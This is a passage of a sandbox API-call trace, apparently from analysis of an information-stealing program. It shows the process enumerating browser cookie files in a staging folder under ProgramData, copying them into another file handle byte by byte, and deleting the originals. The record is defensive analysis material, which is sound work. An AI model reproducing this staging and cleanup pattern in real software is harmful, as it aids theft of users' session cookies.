lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.208] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.208] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.208] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.208] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.208] WriteFile (in: hFile=0x358, lpBuffer=0x19e074*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19e074*, lpNumberOfBytesWritten=0x19ded0*=0x19, lpOverlapped=0x0) returned 1 [0116.208] WriteFile (in: hFile=0x358, lpBuffer=0x19e28c*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19e28c*, lpNumberOfBytesWritten=0x19ded0*=0x11, lpOverlapped=0x0) returned 1 [0116.212] GetDesktopWindow () returned 0x10010 [0116.212] GetTickCount () returned 0x12308b3 [0116.219] GetLastError () returned 0x0 [0116.219] SetLastError (dwErrCode=0x0) [0116.219] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.220] GetLastError () returned 0x0 [0116.220] SetLastError (dwErrCode=0x0) [0116.221] GetLastError () returned 0x0 [0116.221] SetLastError (dwErrCode=0x0) [0116.221] GetLastError () returned 0x0 [0116.221] SetLastError (dwErrCode=0x0) [0116.228] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x6afa8) returned 0x38efa28 [0116.260] ReadFile (in: hFile=0x564, lpBuffer=0x390a998, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x390a998*, lpNumberOfBytesRead=0x19deb8*=0x0, lpOverlapped=0x0) returned 1 [0116.261] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19de84, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19de84*=0x2, lpOverlapped=0x0) returned 1 [0116.262] CloseHandle (hObject=0x564) returned 1 [0116.262] SetFilePointer (in: hFile=0x358, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.262] WriteFile (in: hFile=0x358, lpBuffer=0x19def3*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19def3*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.262] WriteFile (in: hFile=0x358, lpBuffer=0x19def3*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19def3*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.262] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.262] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.262] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.263] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.263] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.263] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.263] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.263] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.263] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.263] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.263] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.263] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.263] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.264] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.264] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.264] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.264] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.264] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.264] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.264] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.264] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.264] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.264] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.264] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.265] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.265] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.265] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.265] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.265] WriteFile (in: hFile=0x358, lpBuffer=0x19e074*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19e074*, lpNumberOfBytesWritten=0x19ded0*=0x19, lpOverlapped=0x0) returned 1 [0116.265] WriteFile (in: hFile=0x358, lpBuffer=0x19e28c*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19e28c*, lpNumberOfBytesWritten=0x19ded0*=0x11, lpOverlapped=0x0) returned 1 [0116.265] SetFilePointer (in: hFile=0x358, lDistanceToMove=74, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a [0116.265] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x9) returned 0x29aab70 [0116.265] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x360) returned 0x29a3368 [0116.269] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970420 | out: hHeap=0x29a0000) returned 1 [0116.269] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaaa8 | out: hHeap=0x29a0000) returned 1 [0116.269] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e40 | out: hHeap=0x29a0000) returned 1 [0116.269] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.269] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\Edge_Cookies.txt" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cookies\\edge_cookies.txt")) returned 1 [0116.356] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eac08 | out: hHeap=0x29a0000) returned 1 [0116.356] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349bb859, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x349bb859, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x349bb859, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE_Cookies.txt", cAlternateFileName="IE_COO~1.TXT")) returned 1 [0116.361] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" [0116.361] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\" [0116.361] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\", lpString2="IE_Cookies.txt" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\IE_Cookies.txt") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\IE_Cookies.txt" [0116.361] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Cookies" | out: lpString1="\\Cookies") returned="\\Cookies" [0116.361] lstrcatW (in: lpString1="\\Cookies", lpString2="\\" | out: lpString1="\\Cookies\\") returned="\\Cookies\\" [0116.361] lstrcatW (in: lpString1="\\Cookies\\", lpString2="IE_Cookies.txt" | out: lpString1="\\Cookies\\IE_Cookies.txt") returned="\\Cookies\\IE_Cookies.txt" [0116.365] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970048 [0116.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\IE_Cookies.txt", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0116.370] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x46) returned 0x38eb838 [0116.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\IE_Cookies.txt", cchWideChar=70, lpMultiByteStr=0x38eb838, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\IE_Cookies.txt", lpUsedDefaultChar=0x0) returned 70 [0116.379] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eac08 [0116.402] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb838 | out: hHeap=0x29a0000) returned 1 [0116.402] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.402] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6938 [0116.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a6938, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.403] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6938 | out: hHeap=0x29a0000) returned 1 [0116.403] PathMatchSpecW (pszFile="IE_Cookies.txt", pszSpec="*.*") returned 1 [0116.403] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970048 [0116.403] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700e0 [0116.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\IE_Cookies.txt", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0116.403] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x46) returned 0x38eb6a8 [0116.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\IE_Cookies.txt", cchWideChar=70, lpMultiByteStr=0x38eb6a8, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\IE_Cookies.txt", lpUsedDefaultChar=0x0) returned 70 [0116.403] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaec8 [0116.403] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb6a8 | out: hHeap=0x29a0000) returned 1 [0116.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Cookies\\IE_Cookies.txt", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0116.403] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970b60 [0116.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Cookies\\IE_Cookies.txt", cchWideChar=24, lpMultiByteStr=0x3970b60, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Cookies\\IE_Cookies.txt", lpUsedDefaultChar=0x0) returned 24 [0116.403] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970510 [0116.403] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b60 | out: hHeap=0x29a0000) returned 1 [0116.407] GetLastError () returned 0x0 [0116.407] SetLastError (dwErrCode=0x0) [0116.407] GetLastError () returned 0x0 [0116.407] SetLastError (dwErrCode=0x0) [0116.407] GetLastError () returned 0x0 [0116.407] SetLastError (dwErrCode=0x0) [0116.407] GetLastError () returned 0x0 [0116.407] SetLastError (dwErrCode=0x0) [0116.407] GetLastError () returned 0x0 [0116.407] SetLastError (dwErrCode=0x0) [0116.407] GetLastError () returned 0x0 [0116.408] SetLastError (dwErrCode=0x0) [0116.408] GetLastError () returned 0x0 [0116.408] SetLastError (dwErrCode=0x0) [0116.408] GetLastError () returned 0x0 [0116.408] SetLastError (dwErrCode=0x0) [0116.408] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\IE_Cookies.txt" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cookies\\ie_cookies.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x564 [0116.408] SetFilePointer (in: hFile=0x358, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a [0116.408] GetFileInformationByHandle (in: hFile=0x564, lpFileInformation=0x19de5c | out: lpFileInformation=0x19de5c) returned 1 [0116.408] GetFileSize (in: hFile=0x564, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0116.408] FileTimeToSystemTime (in: lpFileTime=0x19de1c, lpSystemTime=0x19de04 | out: lpSystemTime=0x19de04) returned 1 [0116.408] SetFilePointer (in: hFile=0x564, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.408] WriteFile (in: hFile=0x358, lpBuffer=0x19def3*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19def3*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.408] WriteFile (in: hFile=0x358, lpBuffer=0x19def3*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19def3*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.409] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.409] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.409] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.409] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.409] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.409] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.409] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.409] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.410] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.410] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.410] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.410] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.410] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.410] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.410] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.410] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.410] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.410] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.411] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.411] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, 